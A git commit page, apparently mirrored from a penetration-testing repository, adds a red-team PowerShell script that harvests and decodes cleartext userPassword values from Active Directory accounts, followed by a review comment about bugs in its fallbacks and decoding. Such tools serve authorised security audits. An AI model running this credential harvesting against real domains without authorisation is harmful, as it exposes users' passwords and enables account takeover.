mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-25 12:01:37 +01:00
Get-UserPasswordEntries.ps1
parent
666c109456
commit
f9c56de0d4
60
red-teaming/Get-UserPasswordEntries.ps1
Normal file
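--- a/red-teaming/Get-UserPasswordEntries.ps1
+++ b/red-teaming/Get-UserPasswordEntries.ps1
@@ -0,0 +1,60 @@
+<#
+This script enumerates user accounts in Active Directory and then collects
+their .userPassword properties, decodes them and prints out.
+
+Assuming we have PowerView's Get-DomainUser command available.
+
+Usage:
+PS> . .\Get-UserPasswordEntries.ps1
+PS> Get-UserPasswordEntries
+
+Mariusz B. / mgeeky
+#>
+
+# This script requires PowerView 3.0 dev branch
+# Import-Module powerview.ps1 -ErrorAction SilentlyContinue
+
+Function Get-UserPasswordEntries
+{
+$num = 0
+
+Get-DomainUser -Filter "(userpassword=*)" -Properties * | % {
+$entry = $_
+$passw = $entry | Select -ExpandProperty userpassword
+$passw2 = $passw | % {[char][int]$_}
+$passw3 = $passw2 -join ''
+$name1 = $entry.samaccountname
+try {
+$desc = $entry.description
+}
+catch {
+$desc = "<empty>"
+}
+
+try {
+$name3 = $entry.serviceprincipalname
+}
+catch {
+$name3 = "<empty>"
+}
+
+$num += 1
+
+$obj = @{
+SamAccountName = $name1
+ServicePrincipalName = $name3
+Description = $desc
+UserPassword = $passw3
+}
+$object = new-object psobject -Property $obj
+
+Write-Host $num".)"
+Write-Host "SamAccountName:`t`t" $object.SamAccountName
+Write-Host "Description:`t`t" $object.Description
+Write-Host "ServicePrincipalName:`t" $object.ServicePrincipalName
+Write-Host "UserPassword:`t`t" $object.UserPassword
+Write-Host
+}
+
+Write-Host "Found in total: "$num" entries."
+}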
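Review bot: The two try/catch blocks around `$entry.description` and `$entry.serviceprincipalname` cannot produce the `<empty>` fallback, because reading a missing property on the returned object yields `$null` rather than throwing (the script does not enable strict mode), so absent attributes simply print as blank. An explicit test such as `$desc = if ($entry.description) { $entry.description } else { "<empty>" }` would do what the catch branches intend. The per-byte `[char][int]$_` decode presumably garbles any value that is not plain ASCII, which deserves at least a comment. Separately, the decoded values are cleartext credentials written only through `Write-Host`, so they land in the console and any active transcript; a header comment should say so, and the already-built `$object` could be emitted instead so the caller decides where that data is kept.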